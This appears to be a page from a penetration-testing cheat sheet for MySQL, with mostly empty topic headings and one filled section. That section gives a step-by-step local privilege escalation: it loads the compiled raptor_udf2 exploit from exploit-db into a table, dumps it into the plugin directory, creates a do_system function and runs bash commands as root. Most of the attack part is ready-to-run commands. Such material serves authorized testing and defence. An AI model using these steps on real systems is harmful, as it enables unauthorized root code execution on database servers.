MySQL
Database commands
Comments
Version
Users
Privileges
Database info
List tables
List columns
Filter table by column name
Access nth row
String operations
Conditional execution
Time delay
Hostname
Passwords
Format: SQL
Vulnerabilities
Arbitrary file access
Arbitrary file write
Local code execution (raptor_udf)
Useful if the database is run with root privileges and you know the credentials. Get payload from https://www.exploit-db.com/exploits/1518 compile and transfer it to target machine.
Login with root credentials
mysql -u root -p <pass>
Find plugin directory
select @@plugin_dir;
Load payload in memory
use mysql;create table foo(line blob);insert into foo values(load_file('<path to payload>'));
Write payload in plugin folder
select * from foo into dumpfile '<plugin folder>/raptor_udf2.so';
Create a function to invoke the payload
create function do_system returns integer soname 'raptor_udf2.so';
Execute commands as root
select do_system("<bash command>");
Last updated